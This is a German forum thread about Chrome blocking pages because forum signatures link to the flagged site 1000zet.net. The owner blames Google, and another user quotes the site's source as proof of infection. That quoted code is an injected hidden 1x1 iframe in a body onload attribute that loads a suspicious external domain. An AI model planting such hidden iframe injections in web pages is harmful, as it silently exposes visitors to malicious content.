Google Chrome Blockt einige Seiten.

  • Tag zusammen,


    also ich habe es das bei einigen Seiten das diese Meldung kommt



    Warum ist, das so?

  • Das sind die Leute mit den "Hilfreich" & "Spam" - Vote Signaturen...
    (zuletzt beispielsweise bei FoxHound gesehen).


    Die Signaturen binden Grafiken von 1000zet ein und verlinken auf das besagte 1000zet.net, welche eben als gefährlich markiert wurde.

    GTA ist wie Schule:
    Man hat ständig eine Mission und macht trotzdem was Anderes...

  • Es tut mir leid, dass Chrome Benutzer momentan diesen Fehler mit meiner Internetseite haben. Das liegt an einem Fehler von Google..
    Ich werde mich bemühen, dass so schell wie möglich zu beheben.

    PAWNit gratis nutzen?
    Geschenkcode: 2017VQXPKB8V3KA

    Hier könnte Ihre Werbung stehen.

  • Das liegt an einem Fehler von Google..
    Ich werde mich bemühen, dass so schell wie möglich zu beheben.


    Du möchtest einen Fehler von Google beheben? Na das möchte ich aber sehen :D


    Es hat sich ein iFrame-Virus auf deiner Webseite eingenistet.
    Mit deiner Aussage möchtest du übrigens Google für deinen Fehler verantwortlich machen :>

  • Da ich keine iFrames verwende, und auch nur eine html Datei mit nennenswertem Inhalt habe, gehe ich davon aus, dass das automatische System von Google nicht richtig funktioniert hat, oder dass eine andere Seite auf dem Server, welcher nicht mir gehört, infiziert ist.

    PAWNit gratis nutzen?
    Geschenkcode: 2017VQXPKB8V3KA

    Hier könnte Ihre Werbung stehen.

  • Da ich keine iFrames verwende, und auch nur eine html Datei mit nennenswertem Inhalt habe, gehe ich davon aus, dass das automatische System von Google nicht richtig funktioniert hat, oder dass eine andere Seite auf dem Server, welcher nicht mir gehört, infiziert ist.

    Ok.


    Code
    <title>1000zet</title>
    <!--google analytics code-->
    </head>
    
    
    <body onload = "<iframe src='http://ihqhghqsg.in/main.php?page=899794c4c5adf4f1' width='1' height='1' frameborder='0'></iframe>">
    	Hier entstehen alle 1000zet-Projekte.
    </body>

    http://www.1000zet.net/